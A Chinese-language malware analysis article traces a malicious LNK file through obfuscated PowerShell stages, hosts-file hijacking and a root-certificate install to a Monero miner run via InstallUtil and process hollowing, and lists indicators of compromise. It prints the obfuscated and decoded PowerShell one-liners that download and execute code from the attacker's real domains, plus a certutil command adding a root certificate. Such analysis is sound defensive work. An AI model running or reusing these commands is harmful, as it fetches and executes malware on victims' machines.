专栏首页信安之路一个 .net 病毒的分析过程

一个 .net 病毒的分析过程

本文作者:病毒分析小组全体成员

样本概述

本次样本为 Lnk 文件,内嵌了一个 Powershell 脚本,用于后续的释放和攻击……

md5 为 13d3d78aa4d28311e8e57ca01d34d11f,VT 扫描结果如下:

行为预览

详细分析

对 Lnk 文件使用 010editor 解析并从命令行提取出有效 payload 如下,根据经验判断为 Invoke-Obfuscation 混淆后的代码。

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-NoPr-WINd1-eXEcByP -jOin('73k69<88Z32~40~78~101m119<45_79P98Z106P101Z99m116@32k83Z121E115P116~101P109l46l78~101Z116l46_87_101m98@67@108k105Z101@110<116P41~46k68m111~119E110m108k111l97Z100k83<116@114_105~110_103P40E39<104m116P116P112l58k47~47m122m118_100P46<117l115m47@49<39l41'.spLIt('<ZPEmk_l@~')|%{([InT]$_-as[cHAr])})|&($sheLLid[1]+$sHelLid[13]+'X')

因为脚本病毒自身的局限性,灵活运用重定向即可反混淆,解密后代码只有一行

IEX (New-ObjectSystem.Net.WebClient).DownloadString('http://zvd.us/1')

访问 http://zvd.us/1 会重定向到 http://qgb.us/view/raw/55f809b0,可见为混淆后的 ps 代码

去除头部 ” &( $VERBOSEpREFeRENCe.tOSTRInG()[1,3]+'X'-JOIn'')”,将脚本输出重定向,解开第一层混淆,发现仍存在混淆,

去除 1.ps1 头部 ” " $(sV 'OFS' '')"+[STrINg]”以及尾部 ” " $(sV 'OFS' '')"+[STrINg]”,继续重定向输出,可见明文脚本,脚本头部代码为弹框提示视频错误从而迷惑受害者

主要功能代码为下载 http://zvd.us/2"$env:temp\tp.bat" 并调用 cmd 执行

$wc=new-object system.net.webclient;$wc.downloadfile("http://zvd.us/2","$env:temp\tp.bat")
UKCgo -BinPath C:\Windows\System32\cmd.exe -Args "/c $env:temp\tp.bat"

http://zvd.us/2 指示去下载 http://zvd.us/3

http://zvd.us/3 重定向到 http://qgb.us/view/raw/a3e7990e,显示为混淆的 ps 代码

解密后发现脚本首先通过注册表操作禁用掉 Windows Dedenfer,SmartScreen 等系统自带的安全功能

之后下载并执行几个文件,下面会逐一分析

脚本中下载链接与实际下载链接对应如下:

"http://tracker.awesomepush.online/5bc63d002c822c0001ff45fd","$env:temp\winstat.exe")
https://s3.amazonaws.com/360ossecure/simple/Alpha/installer.exe

"http://zrkls.pw/geo/geo.php","$env:temp\post2.exe")
http://zrkls.pw/files/svchost.exe

" http://zrkls.pw/p/geoip.php ","$env:temp\post3.exe")
http://zrkls.pw/p/p2.exe

"http://zrkls.pw/geo/geo.php","$env:temp\post2.exe")
http://107.172.196.165:7217/mn.exe

installer.exe 分析

该样本是一个 NSIS 安装包,主要用于网页劫持,用 7-Zip 解压之后,发现存在一个 Bat 脚本文件,pem 证书文件,用于劫持的 Hosts 文件

pem 证书文件如下:

Bat 命令如下:

certutil-addstore"Root"p.pem

将 Hosts 文件与系统的 Hosts 进行替换,内容如下:

NSIS 脚本文件中,将释放出来的 AlphaPassive.msi 添加启动项,用于网页的劫持

在系统中如下

MN.exe 分析

svchost.exe,mn.exe,p2.exe 均为混淆后的 C# 样本,使用 de4dot 即可去混淆,去混淆后发现均为同一种样本,故选取其中一个 mn.exe 分析,使用 dnSpy 打开去混淆后的程序,查看引用,可见存在 System.Configuration.Install,怀疑为利用 C# 自带的 InstallUtil.exe 来加载恶意代码,之后会结合样本解释此技术

当 C# 程序中存在 System.Configuration.Install.Installer 类的派生类时,如果通过 InstallUtil 程序启动,则程序不会从正常的入口点执行,而是从派生类中的 Uninstall 或 Install 类执行,我们在虚拟机中利用 procexp 就可以观察到样本通过 InstallUtil.exe 重新加载自身的行为:

程序正常入口点会调用 Class6.Form0_0.Run() 函数,从而调用 OnCreateMainForm() 函数

OnCreateMainForm() 函数通过 Activator.CreateInstance() 的方式实例化 GForm0,从而调用 GForm0 的构造函数

之后从资源节读取脚本,替换程序路径并执行

作用为通过 installutil.exe 重新启动程序,之后程序将会从 Uninstall 函数开始执行

脚本内容如下:

Uninstall 函数如下:

如果想要调试 Uninstall 函数,可以通过 patch 程序的方法将代码加到入口点,dnSpy 中 patch 程序后需要在文件菜单中选择全部保存才能正常调试

样本从 Uninstall 执行后,会从资源中的图片提取出另一个恶意程序并在内存中执行

执行后,首先进行反虚拟机,反沙箱,反调试操作

之后添加计划任务作为持久化措施

最后通过 process hollowing 的方式在 RegAsm.exe 进程内执行恶意代码,dump 下分析为开源的门罗币矿机 xmrig

github 的地址:

https://github.com/xmrig/xmrig

矿池地址

xmr-us-east1.nanopool.org:14444

钱包地址

428X5bXdQWu1SroTn6vR5nPPoHFDUkntmdppV267SJH2dXw3mMttKGQ8Tt49BPHbt2PXyEKdit5dx499AdkvGMgkUSLCc8j

13 个门罗币……

根据开源威胁情报可见服务器上还存在其他恶意代码。

http[:]//zrkls[.]]pw/http[:]//zrkls[.]pw/azhttp[:]//zrkls[.]pw/az/az[.]exehttp[:]//zrkls[.]pw/az/index[.]phphttp[:]//zrkls[.]pw/files/svchost[.]exehttp[:]//zrkls[.]pw/geo/geo[.]phphttp[:]//zrkls[.]pw/geo/geo[.]php,Patternhttp[:]//zrkls[.]pw/geo/nullhttp[:]//zrkls[.]pw/phttp[:]//zrkls[.]pw/p/geoip[.]phphttp[:]//zrkls[.]pw/p/nullhttp[:]//zrkls[.]pw/p/p2[.]exehttp[:]//zrkls[.]pw/tasks[.]phphttp[:]//zrkls[.]pw/upload/pd[.]exehttp[:]//zrkls[.]pw/upload/smk[.]exehttp[:]//zrkls[.]pw/upload/svchost[.]exehttp[:]//zrkls[.]pw/upload/win2[.]exehttp[:]//zrkls[.]pw/upload/wincircuit[.]exe

IOC

域名:

http[:]//zvd[.]ushttp[:]//qgb[.]ushttp[:]//tracker[.]awesomepush[.]onlinehttps[:]//s3[.]amazonaws[.]comhttp[:]//zrkls[.]pw

主要样本的SHA1:

d16d74d6c97d4704186bfcaa949c0f2f67ef30a28b511650e60229d6da9d6712a08d01514ce374a31d651924cbca82c12b4521cb33af79ef7af857b9

本文分享自微信公众号 - 信安之路(xazlsec)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-11-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 一个病毒样本分析的全过程

    SHA1: 3f738735bb0c5c95792c21d618eca8c0d5624717

    信安之路
  • 一个自称 lpk.dll 的病毒分析

    该样本将自己命名为 lpk.dll,与系统 lpk.dll 同名,在程序需要使用 lpk.dll 时,便会遭到该样本的劫持。

    信安之路
  • 一个简单的挖矿病毒分析

    CMD 命令行.txt,start.ps1,1.ps1,knbhm.jpg,svchost.exe

    信安之路
  • 练手之经典病毒熊猫烧香分析(上)

    七夜安全博客
  • 一个带简单密码的病毒分析

    分析有用的字符串,大致猜测该病毒的功能,此病毒有请求域名服务器、注册服务、修改字符串、调用 cmd 命令行执行程序等功能。

    信安之路
  • 事件分析 | 门罗币挖矿新家族「罗生门」

    腾讯安全云鼎实验室通过部署的威胁感知系统捕获了一批挖矿样本(具有同源性),是一批可挖取门罗币(xmr)的挖矿病毒。这批样本今年5月开始出现,目前各大杀软对此样本...

    云鼎实验室
  • 事件分析 | 门罗币挖矿新家族「罗生门」

    腾讯安全云鼎实验室通过部署的威胁感知系统捕获了一批挖矿样本(具有同源性),是一批可挖取门罗币(xmr)的挖矿病毒。这批样本今年5月开始出现,目前各大杀软对此样...

    云鼎实验室
  • 勒索之殇 | 从一个.NET病毒看透勒索三步曲

    近三年的病毒走势大致可以总结为,2016年”流氓”,2017”勒索”,2018年”挖矿”,这篇文章我们就通过分析一个.Net的勒索软件,看看一个勒索软件到底是如...

    FB客服
  • 今日 Paper | COVID-19;深度兴趣网络;COVIDX-NET;场景文本迁移等

    COVIDX-NET:一种用于诊断X射线图像中COVID-19的深度学习分类器框架

    AI科技评论
  • 404 Keylogger最新木马,盗取受害者浏览器网站帐号和密码

    近日深信服安全团队捕获到一个最新的404 Keylogger木马变种,通过OFFICE文档嵌入恶意宏代码进行传播,盗取受害者浏览器的网站帐号和密码,深信服安全团...

    FB客服
  • 永恒之石,你怕了吗?

    永恒之石,你怕了吗? From ChaMd5安全团队核心成员 逍遥自在 这个五月,我们经历了感染了7万5千台电脑的WannaCry,没有了紧急开关的 Wanna...

    ChaMd5安全团队
  • 谁给了你第一个手机病毒?安卓手机病毒来源分析

    用户手机的第一个病毒从何而来?这篇文章也许能给你答案。 新应用安装概况 在用户下载安装应用之时,Clean Master会对下载的文件进行安全扫描,仅从Clea...

    FB客服
  • 自己手动复现一个熊猫烧香病毒

    最近逛了一下 bilibili ,偶然的一次机会,我在 bilibili 上看到了某个 up 主分享了一个他自己仿照熊猫病毒的原型制作的一个病毒的演示视频,虽然...

    Angel_Kitty
  • 不容错过 | “永恒之蓝”勒索病毒安全处置FAQ

    病毒相关 Q 为什么此次勒索病毒“永恒之蓝”感染人数如此之多? A 此次勒索软件利用了NSA黑客武器库泄漏的“永恒之蓝”工具进行网络感染,只要是Windows ...

    安恒信息
  • 黑产攻击途径升级,云服务成重灾区

    在我们的印象里,黑产以及相关的肉鸡DDOS攻击总是离我们很远。可实际情况并非如此,特别是在云服务大行其道的今天。 日前,腾讯反病毒实验室就观察到了国内云服务中G...

    FB客服
  • 激活工具散播锁首病毒“麻辣香锅“ 诱导用户退出安全软件

    近期,有大量用户在火绒论坛反馈首页遭遇劫持。火绒工程师溯源发现,上述用户均是在某激活工具官网(现已被火绒拦截)下载安装了暴风激活、KMS、小马激活等激活工具导致...

    用户6477171
  • 记一次“本以为简简单单但发现有一丁点复杂”的安全分析事件

    2021年某日某时,正吃完午饭的我,揉着眼睛打开态势感知平台准备日常划水,突然一个告警引起了我的注意,于是我“啪”的一下,很快啊,赶紧把相关告警进行溯源排查,一...

    FB客服
  • GlobeImposter2.0再出新变种,疑似利用PsExec内网传播

    近日,深信服安全团队发现了GlobeImposter2.0勒索病毒新变种,该变种疑似利用微软官网工具PsExec进行内网传播并使用了新的勒索界面。截止目前,国内...

    FB客服
  • 一个“良心未泯”的国产敲诈者病毒分析

    一、 前言 近两年,以敲诈勒索为目的的文件加密恶意软件逐渐成为恶意软件中的主力军。以Locky家族,ceber家族为典型代表的敲诈勒索软件席卷国外,对政府机构,...

    FB客服

扫码关注云+社区

领取腾讯云代金券